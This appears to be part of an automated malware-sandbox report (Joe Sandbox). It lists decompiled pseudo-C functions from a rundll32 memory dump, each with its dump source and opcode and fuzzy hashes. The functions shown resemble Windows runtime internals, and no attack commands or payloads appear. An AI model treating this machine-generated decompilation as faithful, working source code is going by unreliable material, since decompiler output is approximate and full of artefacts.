                                                                                                                								}
                                                                                                                								__eflags = _t80 -  *(_t85 - 0x30);
                                                                                                                								if(_t80 !=  *(_t85 - 0x30)) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								__eflags = _t80;
                                                                                                                								if(_t80 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t63 = 0;
                                                                                                                								 *(_t85 - 0x34) = 0;
                                                                                                                								_t84 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                								while(1) {
                                                                                                                									 *(_t85 - 0x3c) = _t84;
                                                                                                                									__eflags = _t84 - 3;
                                                                                                                									if(_t84 >= 3) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									__eflags = _t63;
                                                                                                                									if(_t63 != 0) {
                                                                                                                										L40:
                                                                                                                										_t84 =  *_t63;
                                                                                                                										__eflags = _t84;
                                                                                                                										if(_t84 != 0) {
                                                                                                                											_t84 =  *(_t84 + 4);
                                                                                                                											__eflags = _t84;
                                                                                                                											if(_t84 != 0) {
                                                                                                                												 *0x44fb1e0(_t63, _t82);
                                                                                                                												 *_t84();
                                                                                                                											}
                                                                                                                										}
                                                                                                                										do {
                                                                                                                											_t60 = _t82 + 8;
                                                                                                                											 *(_t85 - 0x2c) = _t60;
                                                                                                                											_t68 =  *_t60;
                                                                                                                											_t80 = _t60[1];
                                                                                                                											 *(_t85 - 0x28) = _t68;
                                                                                                                											 *(_t85 - 0x24) = _t80;
                                                                                                                											goto L10;
                                                                                                                										} while (_t63 == 0);
                                                                                                                										goto L40;
                                                                                                                									}
                                                                                                                									_t69 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									while(1) {
                                                                                                                										 *(_t85 - 0x38) = _t69;
                                                                                                                										__eflags = _t69 -  *0x44f84c0;
                                                                                                                										if(_t69 >=  *0x44f84c0) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										__eflags = _t63;
                                                                                                                										if(_t63 != 0) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										_t66 = E044D9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                                                                										__eflags = _t66;
                                                                                                                										if(_t66 == 0) {
                                                                                                                											_t63 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t63 = _t66 + 0xfffffff4;
                                                                                                                										}
                                                                                                                										 *(_t85 - 0x34) = _t63;
                                                                                                                										_t69 = _t69 + 1;
                                                                                                                									}
                                                                                                                									_t84 = _t84 + 1;
                                                                                                                								}
                                                                                                                								__eflags = _t63;
                                                                                                                							}
                                                                                                                							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                                                                							 *((char*)(_t82 + 0xe5)) = 1;
                                                                                                                							 *((char*)(_t85 - 0x1d)) = 1;
                                                                                                                							L12:
                                                                                                                							 *(_t85 - 4) = 0xfffffffe;
                                                                                                                							E0440922A(_t82);
                                                                                                                							_t53 = E04427D50();
                                                                                                                							__eflags = _t53;
                                                                                                                							if(_t53 != 0) {
                                                                                                                								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                							} else {
                                                                                                                								_t56 = 0x7ffe0386;
                                                                                                                							}
                                                                                                                							__eflags =  *_t56;
                                                                                                                							if( *_t56 != 0) {
                                                                                                                								_t56 = E044D8B58(_t82);
                                                                                                                							}
                                                                                                                							__eflags =  *((char*)(_t85 - 0x1d));
                                                                                                                							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                                                                								__eflags = _t82 -  *0x44f86c0; // 0x3507b0
                                                                                                                								if(__eflags != 0) {
                                                                                                                									__eflags = _t82 -  *0x44f86b8; // 0x0
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t79 = 0x44f86bc;
                                                                                                                										_t72 = 0x44f86b8;
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                									__eflags = _t56 | 0xffffffff;
                                                                                                                									asm("lock xadd [edi], eax");
                                                                                                                									if(__eflags == 0) {
                                                                                                                										E04409240(_t68, _t82, _t82, _t84, __eflags);
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_t79 = 0x44f86c4;
                                                                                                                									_t72 = 0x44f86c0;
                                                                                                                									L18:
                                                                                                                									E04439B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















                                                                                                                0x04409177
                                                                                                                0x0440917e
                                                                                                                0x0440917f
                                                                                                                0x04409182
                                                                                                                0x04409182
                                                                                                                0x04409187
                                                                                                                0x04409187
                                                                                                                0x0440918a
                                                                                                                0x0440918d
                                                                                                                0x0440918f
                                                                                                                0x04409192
                                                                                                                0x04409195
                                                                                                                0x04409198
                                                                                                                0x04409198
                                                                                                                0x04409198
                                                                                                                0x0440919a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446371f
                                                                                                                0x04463721
                                                                                                                0x04463727
                                                                                                                0x0446372f
                                                                                                                0x04463733
                                                                                                                0x04463735
                                                                                                                0x04463738
                                                                                                                0x0446373b
                                                                                                                0x0446373d
                                                                                                                0x04463740
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463746
                                                                                                                0x04463749
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446374f
                                                                                                                0x04463751
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463757
                                                                                                                0x04463759
                                                                                                                0x0446375c
                                                                                                                0x0446375c
                                                                                                                0x0446375e
                                                                                                                0x0446375e
                                                                                                                0x04463761
                                                                                                                0x04463764
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463766
                                                                                                                0x04463768
                                                                                                                0x044637a3
                                                                                                                0x044637a3
                                                                                                                0x044637a5
                                                                                                                0x044637a7
                                                                                                                0x044637ad
                                                                                                                0x044637b0
                                                                                                                0x044637b2
                                                                                                                0x044637bc
                                                                                                                0x044637c2
                                                                                                                0x044637c2
                                                                                                                0x044637b2
                                                                                                                0x04409187
                                                                                                                0x04409187
                                                                                                                0x0440918a
                                                                                                                0x0440918d
                                                                                                                0x0440918f
                                                                                                                0x04409192
                                                                                                                0x04409195
                                                                                                                0x00000000
                                                                                                                0x04409195
                                                                                                                0x00000000
                                                                                                                0x04409187
                                                                                                                0x0446376a
                                                                                                                0x0446376a
                                                                                                                0x0446376c
                                                                                                                0x0446376c
                                                                                                                0x0446376f
                                                                                                                0x04463775
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463777
                                                                                                                0x04463779
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463782
                                                                                                                0x04463787
                                                                                                                0x04463789
                                                                                                                0x04463790
                                                                                                                0x04463790
                                                                                                                0x0446378b
                                                                                                                0x0446378b
                                                                                                                0x0446378b
                                                                                                                0x04463792
                                                                                                                0x04463795
                                                                                                                0x04463795
                                                                                                                0x04463798
                                                                                                                0x04463798
                                                                                                                0x0446379b
                                                                                                                0x0446379b
                                                                                                                0x044091a3
                                                                                                                0x044091a9
                                                                                                                0x044091b0
                                                                                                                0x044091b4
                                                                                                                0x044091b4
                                                                                                                0x044091bb
                                                                                                                0x044091c0
                                                                                                                0x044091c5
                                                                                                                0x044091c7
                                                                                                                0x044637da
                                                                                                                0x044091cd
                                                                                                                0x044091cd
                                                                                                                0x044091cd
                                                                                                                0x044091d2
                                                                                                                0x044091d5
                                                                                                                0x04409239
                                                                                                                0x04409239
                                                                                                                0x044091d7
                                                                                                                0x044091db
                                                                                                                0x044091e1
                                                                                                                0x044091e7
                                                                                                                0x044091fd
                                                                                                                0x04409203
                                                                                                                0x0440921e
                                                                                                                0x04409223
                                                                                                                0x00000000
                                                                                                                0x04409223
                                                                                                                0x04409205
                                                                                                                0x04409208
                                                                                                                0x0440920c
                                                                                                                0x04409214
                                                                                                                0x04409214
                                                                                                                0x044091e9
                                                                                                                0x044091e9
                                                                                                                0x044091ee
                                                                                                                0x044091f3
                                                                                                                0x044091f3
                                                                                                                0x044091f3
                                                                                                                0x044091e7
                                                                                                                0x00000000
                                                                                                                0x044091db
                                                                                                                0x04409187
                                                                                                                0x04409168

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 62a591a9bf7b230dd577815107b84a87938ac3c1977fecdc613ae2d1e864f152
                                                                                                                • Instruction ID: 158ee61045ecc5dee5862ad284f9e97ed35c8560e517d42f66ef7db75e69b1e0
                                                                                                                • Opcode Fuzzy Hash: 62a591a9bf7b230dd577815107b84a87938ac3c1977fecdc613ae2d1e864f152
                                                                                                                • Instruction Fuzzy Hash: C9317EB1B012849FFF21EF69C4487AEB7B1BB49315F18C56BC4156B382C334B9908B52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E04420050(void* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				intOrPtr* _t31;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t40;
                                                                                                                				void* _t41;
                                                                                                                				signed int _t44;
                                                                                                                				intOrPtr _t47;
                                                                                                                				signed int _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t61;
                                                                                                                				void* _t62;
                                                                                                                				signed int _t64;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_v8 =  *0x44fd360 ^ _t64;
                                                                                                                				_t61 = __ecx;
                                                                                                                				_t2 = _t61 + 0x20; // 0x20
                                                                                                                				E04439ED0(_t2, 1, 0);
                                                                                                                				_t52 =  *(_t61 + 0x8c);
                                                                                                                				_t4 = _t61 + 0x8c; // 0x8c
                                                                                                                				_t40 = _t4;
                                                                                                                				do {
                                                                                                                					_t44 = _t52;
                                                                                                                					_t58 = _t52 & 0x00000001;
                                                                                                                					_t24 = _t44;
                                                                                                                					asm("lock cmpxchg [ebx], edx");
                                                                                                                					_t52 = _t44;
                                                                                                                				} while (_t52 != _t44);
                                                                                                                				if(_t58 == 0) {
                                                                                                                					L7:
                                                                                                                					_pop(_t59);
                                                                                                                					_pop(_t62);
                                                                                                                					_pop(_t41);
                                                                                                                					return E0444B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                                                                				}
                                                                                                                				asm("lock xadd [esi], eax");
                                                                                                                				_t47 =  *[fs:0x18];
                                                                                                                				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                                                                				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                				if(_t30 != 0) {
                                                                                                                					if( *_t30 == 0) {
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                					L5:
                                                                                                                					if( *_t31 != 0) {
                                                                                                                						_t18 = _t61 + 0x78; // 0x78
                                                                                                                						E044D8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                                                                					}
                                                                                                                					_t52 =  *(_t61 + 0x5c);
                                                                                                                					_t11 = _t61 + 0x78; // 0x78
                                                                                                                					_t34 = E04439702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                                                                					_t24 = _t34 | 0xffffffff;
                                                                                                                					asm("lock xadd [esi], eax");
                                                                                                                					if((_t34 | 0xffffffff) == 0) {
                                                                                                                						 *0x44fb1e0(_t61);
                                                                                                                						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				L4:
                                                                                                                				_t31 = 0x7ffe0386;
                                                                                                                				goto L5;
                                                                                                                			}





















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12b3b6015aa95ec2565ffcac4d18e9e58964ab1bfa0e83298183c004f276f447
                                                                                                                • Instruction ID: f331938a77ded749e5254a4c0c6477006ed4559588e62a1af4067aaafe9927ca
                                                                                                                • Opcode Fuzzy Hash: 12b3b6015aa95ec2565ffcac4d18e9e58964ab1bfa0e83298183c004f276f447
                                                                                                                • Instruction Fuzzy Hash: C5317C31601A14CFEB21CF28D944B57B3E5FF88718F14456EE59687B90EB75B801CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E04486C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                                                                                				signed short* _v8;
                                                                                                                				signed char _v12;
                                                                                                                				void* _t22;
                                                                                                                				signed char* _t23;
                                                                                                                				intOrPtr _t24;
                                                                                                                				signed short* _t44;
                                                                                                                				void* _t47;
                                                                                                                				signed char* _t56;
                                                                                                                				signed char* _t58;
                                                                                                                
                                                                                                                				_t48 = __ecx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t44 = __ecx;
                                                                                                                				_v12 = __edx;
                                                                                                                				_v8 = __ecx;
                                                                                                                				_t22 = E04427D50();
                                                                                                                				_t58 = 0x7ffe0384;
                                                                                                                				if(_t22 == 0) {
                                                                                                                					_t23 = 0x7ffe0384;
                                                                                                                				} else {
                                                                                                                					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                				}
                                                                                                                				if( *_t23 != 0) {
                                                                                                                					_t24 =  *0x44f7b9c; // 0x0
                                                                                                                					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                                                                                					_t23 = L04424620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                                                                                					_t56 = _t23;
                                                                                                                					if(_t56 != 0) {
                                                                                                                						_t56[0x24] = _a4;
                                                                                                                						_t56[0x28] = _a8;
                                                                                                                						_t56[6] = 0x1420;
                                                                                                                						_t56[0x20] = _v12;
                                                                                                                						_t14 =  &(_t56[0x2c]); // 0x2c
                                                                                                                						E0444F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                                                                                						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                                                                                						if(E04427D50() != 0) {
                                                                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                						}
                                                                                                                						_push(_t56);
                                                                                                                						_push(_t47 - 0x20);
                                                                                                                						_push(0x402);
                                                                                                                						_push( *_t58 & 0x000000ff);
                                                                                                                						E04449AE0();
                                                                                                                						_t23 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t23;
                                                                                                                			}













                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c072fbb8ae9f5e0c9795ae21580e2371d432b858c35ce381d58ff48519897257
                                                                                                                • Instruction ID: 050537c8290525ee07fd78634550e5c153a51770cb2d7bb4bd29cb9ed7eb9902
                                                                                                                • Opcode Fuzzy Hash: c072fbb8ae9f5e0c9795ae21580e2371d432b858c35ce381d58ff48519897257
                                                                                                                • Instruction Fuzzy Hash: F4219CB1A00654AFEB15DF69D980F6AB7B8FF48744F14006AF904D7B92D638ED10CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E044490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                                				intOrPtr* _v0;
                                                                                                                				void* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				char _v36;
                                                                                                                				void* _t38;
                                                                                                                				intOrPtr _t41;
                                                                                                                				void* _t44;
                                                                                                                				signed int _t45;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				signed int _t57;
                                                                                                                				signed int _t58;
                                                                                                                				intOrPtr* _t59;
                                                                                                                				void* _t62;
                                                                                                                				void* _t63;
                                                                                                                				void* _t65;
                                                                                                                				void* _t66;
                                                                                                                				signed int _t69;
                                                                                                                				intOrPtr* _t70;
                                                                                                                				void* _t71;
                                                                                                                				intOrPtr* _t72;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				char _t74;
                                                                                                                
                                                                                                                				_t65 = __edx;
                                                                                                                				_t57 = _a4;
                                                                                                                				_t32 = __ecx;
                                                                                                                				_v8 = __edx;
                                                                                                                				_t3 = _t32 + 0x14c; // 0x14c
                                                                                                                				_t70 = _t3;
                                                                                                                				_v16 = __ecx;
                                                                                                                				_t72 =  *_t70;
                                                                                                                				while(_t72 != _t70) {
                                                                                                                					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                                                                						L24:
                                                                                                                						_t72 =  *_t72;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					_t30 = _t72 + 0x10; // 0x10
                                                                                                                					if(E0445D4F0(_t30, _t65, _t57) == _t57) {
                                                                                                                						return 0xb7;
                                                                                                                					}
                                                                                                                					_t65 = _v8;
                                                                                                                					goto L24;
                                                                                                                				}
                                                                                                                				_t61 = _t57;
                                                                                                                				_push( &_v12);
                                                                                                                				_t66 = 0x10;
                                                                                                                				if(E0443E5E0(_t57, _t66) < 0) {
                                                                                                                					return 0x216;
                                                                                                                				}
                                                                                                                				_t73 = L04424620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                                                                				if(_t73 == 0) {
                                                                                                                					_t38 = 0xe;
                                                                                                                					return _t38;
                                                                                                                				}
                                                                                                                				_t9 = _t73 + 0x10; // 0x10
                                                                                                                				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                                                                				E0444F3E0(_t9, _v8, _t57);
                                                                                                                				_t41 =  *_t70;
                                                                                                                				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                                                                					_t62 = 3;
                                                                                                                					asm("int 0x29");
                                                                                                                					_push(_t62);
                                                                                                                					_push(_t57);
                                                                                                                					_push(_t73);
                                                                                                                					_push(_t70);
                                                                                                                					_t71 = _t62;
                                                                                                                					_t74 = 0;
                                                                                                                					_v36 = 0;
                                                                                                                					_t63 = E0443A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                                                                					if(_t63 == 0) {
                                                                                                                						L20:
                                                                                                                						_t44 = 0x57;
                                                                                                                						return _t44;
                                                                                                                					}
                                                                                                                					_t45 = _v12;
                                                                                                                					_t58 = 0x1c;
                                                                                                                					if(_t45 < _t58) {
                                                                                                                						goto L20;
                                                                                                                					}
                                                                                                                					_t69 = _t45 / _t58;
                                                                                                                					if(_t69 == 0) {
                                                                                                                						L19:
                                                                                                                						return 0xe8;
                                                                                                                					}
                                                                                                                					_t59 = _v0;
                                                                                                                					do {
                                                                                                                						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                                                                						 *_t59 = _t49;
                                                                                                                						if( *_t49 != 0x53445352) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                                                						return 0;
                                                                                                                						L18:
                                                                                                                						_t63 = _t63 + 0x1c;
                                                                                                                						_t74 = _t74 + 1;
                                                                                                                					} while (_t74 < _t69);
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                				 *_t73 = _t41;
                                                                                                                				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                                                                				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                                                                				 *_t70 = _t73;
                                                                                                                				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                                                                				return 0;
                                                                                                                			}



























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                • Instruction ID: 52d2573e3daf82d9b842bdfd03ee5bceb6ea21f7bd2a5cf5fb32da43e0250aa5
                                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                • Instruction Fuzzy Hash: C42171B1A00204EFFF30DF65C545A6BB7F8EB84714F14846BE98597211D630B9459B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 59%
                                                                                                                			E04433B7A(void* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _t17;
                                                                                                                				intOrPtr _t26;
                                                                                                                				void* _t35;
                                                                                                                				void* _t38;
                                                                                                                				void* _t41;
                                                                                                                				intOrPtr _t44;
                                                                                                                
                                                                                                                				_t17 =  *0x44f84c4; // 0x0
                                                                                                                				_v12 = 1;
                                                                                                                				_v8 =  *0x44f84c0 * 0x4c;
                                                                                                                				_t41 = __ecx;
                                                                                                                				_t35 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x44f84c0 * 0x4c);
                                                                                                                				if(_t35 == 0) {
                                                                                                                					_t44 = 0xc0000017;
                                                                                                                				} else {
                                                                                                                					_push( &_v8);
                                                                                                                					_push(_v8);
                                                                                                                					_push(_t35);
                                                                                                                					_push(4);
                                                                                                                					_push( &_v12);
                                                                                                                					_push(0x6b);
                                                                                                                					_t44 = E0444AA90();
                                                                                                                					_v20 = _t44;
                                                                                                                					if(_t44 >= 0) {
                                                                                                                						E0444FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x44f84c0 * 0xc);
                                                                                                                						_t38 = _t35;
                                                                                                                						if(_t35 < _v8 + _t35) {
                                                                                                                							do {
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                                                                							} while (_t38 < _v8 + _t35);
                                                                                                                							_t44 = _v20;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t26 =  *0x44f84c4; // 0x0
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                                                                				}
                                                                                                                				return _t44;
                                                                                                                			}













                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05b86b007b2b5c26cd0c2ca7e28b15746fbfe0514b57dcad74d9d960e24df6d5
                                                                                                                • Instruction ID: 86fde0eaa0a3144938494a9e9101b8e0557a97e61ee1c18f7e5f0cce03a4cfec
                                                                                                                • Opcode Fuzzy Hash: 05b86b007b2b5c26cd0c2ca7e28b15746fbfe0514b57dcad74d9d960e24df6d5
                                                                                                                • Instruction Fuzzy Hash: D621A172A00118AFEB10DF98CE81F5AB7BDFB44708F150169EA08AB252D775FD11CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E04486CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                                                                                				char _v8;
                                                                                                                				char _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v20;
                                                                                                                				char _v28;
                                                                                                                				char _v36;
                                                                                                                				char _v52;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed char* _t21;
                                                                                                                				void* _t24;
                                                                                                                				void* _t36;
                                                                                                                				void* _t38;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_push(_t36);
                                                                                                                				_t46 = __edx;
                                                                                                                				_v12 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t21 = 0x7ffe0384;
                                                                                                                				} else {
                                                                                                                					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                				}
                                                                                                                				if( *_t21 != 0) {
                                                                                                                					_t21 =  *[fs:0x30];
                                                                                                                					if((_t21[0x240] & 0x00000004) != 0) {
                                                                                                                						if(E04427D50() == 0) {
                                                                                                                							_t21 = 0x7ffe0385;
                                                                                                                						} else {
                                                                                                                							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                						}
                                                                                                                						if(( *_t21 & 0x00000020) != 0) {
                                                                                                                							_t56 = _t46;
                                                                                                                							if(_t46 == 0) {
                                                                                                                								_t46 = 0x43e5c80;
                                                                                                                							}
                                                                                                                							_push(_t46);
                                                                                                                							_push( &_v12);
                                                                                                                							_t24 = E0443F6E0(_t36, 0, _t46, _t56);
                                                                                                                							_push(_a4);
                                                                                                                							_t38 = _t24;
                                                                                                                							_push( &_v28);
                                                                                                                							_t21 = E0443F6E0(_t38, 0, _t46, _t56);
                                                                                                                							if(_t38 != 0) {
                                                                                                                								if(_t21 != 0) {
                                                                                                                									E04487016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                                                                                									L04422400( &_v52);
                                                                                                                								}
                                                                                                                								_t21 = L04422400( &_v28);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t21;
                                                                                                                			}




















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e5f09b6e6e8dd167d934ba8ce2993b16abd98bc705c529948a81fc10178b2b00
                                                                                                                • Instruction ID: 6b8e92447d29b695d7a6671fe78a48693daf562b90660543499e12ebe8754f87
                                                                                                                • Opcode Fuzzy Hash: e5f09b6e6e8dd167d934ba8ce2993b16abd98bc705c529948a81fc10178b2b00
                                                                                                                • Instruction Fuzzy Hash: 8B21D0725006449BDB21EF6ACA44B6FB7ECAF81744F05045FB94087362E734FA09C6A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

